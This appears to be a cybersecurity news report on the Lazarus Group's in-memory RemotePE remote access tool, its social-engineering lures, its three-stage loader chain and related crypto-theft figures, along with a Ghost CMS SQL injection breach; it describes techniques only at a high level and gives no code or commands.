Cybersecurity experts have detected a new strain of malware deployed by the North Korea-linked Lazarus Group. This “RemotePE” fileless remote access tool (RAT) specifically targets banks and cryptocurrency firms. Discovered in September 2025, the malware operates entirely in memory, making it exceptionally hard for conventional security systems to detect, as it leaves virtually no trace on infected machines.
Lazarus Group’s social engineering strategy
Lazarus Group attacks often begin with sophisticated social engineering. Posing as employees of investment firms on Telegram, attackers initiate contact and send fake meeting requests via platforms like Calendly and Picktime. After the initial meeting, the attackers follow up with a sequence of steps that culminate in the malicious software being installed on the victim’s device. This “human factor” approach significantly increases the likelihood of a successful breach.
Lazarus Group exploits social engineering by drawing victims into trusted relationships, enabling the first stage of malware installation. The attack progresses through a targeted and multi-step chain for maximum impact.
In the opening phase, a dynamic-link library (DLL) named DPAPILoader is activated. This component uses Windows’ Data Protection Application Programming Interface (DPAPI) to decrypt the next-stage payload stored on disk. The RemotePELoader then retrieves this payload via HTTP from a remote Command and Control (C2) server and loads it directly into memory. Finally, the main RemotePE malware strikes, activating solely in memory and barely interacting with the file system.
Mini glossary: A C2 (Command and Control) server is a central hub used by attackers to remotely manage malware, exchange instructions and transmit stolen data.
Three-stage next-generation attack chain
RemotePELoader employs advanced evasion techniques such as Hell’s Gate and ETW Patching to circumvent contemporary security tools. This three-stage architecture minimizes disk activity and makes tracking digital footprints nearly impossible. After a recent disclosed incident, investigators found that a decentralized finance (DeFi) company’s infrastructure was compromised through the sequential use of three remote access tools: RemotePE, PondRAT, and ThemeForestRAT.
| Attack Tool | Year Used | Detection Difficulty | Target Sector |
|---|---|---|---|
| RemotePE | 2025-2026 | Very high | Crypto, Banking |
| PondRAT | 2025 | High | DeFi, Finance |
| ThemeForestRAT | 2025 | High | Finance |
Lazarus Group’s 2026 track record and technical analysis
Fox-IT’s analysis shows that RemotePE’s use of DPAPI for key management, exclusive memory-based operations, and advanced evasion techniques like ETW patching and Hell’s Gate render it nearly immune to standard detection and analysis tools. These traits reveal that conventional anti-malware scans are largely ineffective. Furthermore, Lazarus Group was found to have stolen a total of $577 million in crypto in just two major hacks, accounting for 76% of all global crypto thefts in the first four months of 2026.
TRM Labs reports that North Korea-linked hackers stole $577 million worth of digital assets in only two incidents during the first four months of 2026, pushing North Korea’s share of crypto thefts to its highest level in recent years.
While North Korean actors accounted for 64% of crypto hacks in 2025, their share surged to 76% in 2026. Since 2017, the cumulative value of stolen crypto has reached $6 billion, fueling allegations that these funds support the country’s sanctioned weapons and nuclear programs.
AI-driven attacks and software vulnerabilities
As digital asset traders and developers increasingly turn to artificial intelligence for streamlined operations, attackers are also leveraging AI-based techniques. Experts have revealed a mass data breach affecting over 700 sites running the Ghost content management system, caused by a critical SQL injection vulnerability.
As a result, administrative usernames and passwords were captured, allowing malicious software to spread across distribution channels such as ClickFix. The targeted list includes universities, AI projects, blockchain service providers, software companies, and fintech startups. Victims who execute Base64-encrypted code supplied via fake CAPTCHA prompts unwittingly download malware-laden files.
Older versions of the malware were deployed using Windows’ “rundll32.exe” utility, but more recently, attackers have utilized the open-source Electron-based Grape app to infiltrate systems. Once installed, the malware connects to its C2 domain every 30 seconds to receive fresh commands.
